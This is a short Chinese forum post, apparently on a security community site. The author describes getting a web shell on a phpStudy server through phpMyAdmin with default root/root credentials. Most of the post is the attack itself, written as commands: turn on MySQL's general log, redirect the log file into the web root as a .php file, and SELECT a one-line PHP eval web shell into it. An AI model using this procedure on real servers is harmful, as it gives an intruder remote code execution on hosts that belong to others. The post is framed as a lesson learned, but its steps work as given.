前言:我的服务器是挂机用的,无趣的时候安装了vc9与phpstudy,并没有挂任何网站,但是也被getshell,后来将www文件夹下面的opp.php改成txt格式我就知道了这是日志法getshell。
首先搞懂什么是phpmyadmin,他就是一个可以远程连接数据库的方便功能。
看到登录框了吗?看到路径了吗?
我就是吃了初始密码的亏
账号为root 密码为root
然后要明白为什么要用日志去搞
因为大于5.0的版本会生成日志
SELECT @@version , @@version_comment
此时你要想让大马在服务器当中发挥它?作用就需要以php文件的形式存在
所以,就要在日志保存状态(general log)与保存路径(general_log_file)做动作
set global general_log=on
select @@basedir
SET global general_log_file='C:/phpStudy/WWW/h4nk.php'
SELECT '<?php eval(@$_POST["h4nk"]);?>'
用户名 | 金币 | 积分 | 时间 | 理由 |
---|---|---|---|---|
Track-劲夫 | 50.00 | 0 | 2022-04-02 15:03:22 | 一个受益终生的帖子~~ |
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.
lihua666
发表于 2022-4-12
额,这是上古的洞吧
评论列表
加载数据中...